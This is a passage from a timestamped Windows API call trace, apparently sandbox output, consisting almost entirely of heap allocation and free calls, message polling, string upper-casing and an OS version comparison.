Flags=0x0, Size=0x4) returned 0x24b1428 [0207.306] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0207.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.307] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.308] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.308] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.308] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.309] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.310] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.310] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.312] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0207.312] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0207.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.314] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.314] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0207.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.314] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.315] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.315] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.316] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.319] HeapFree (in: 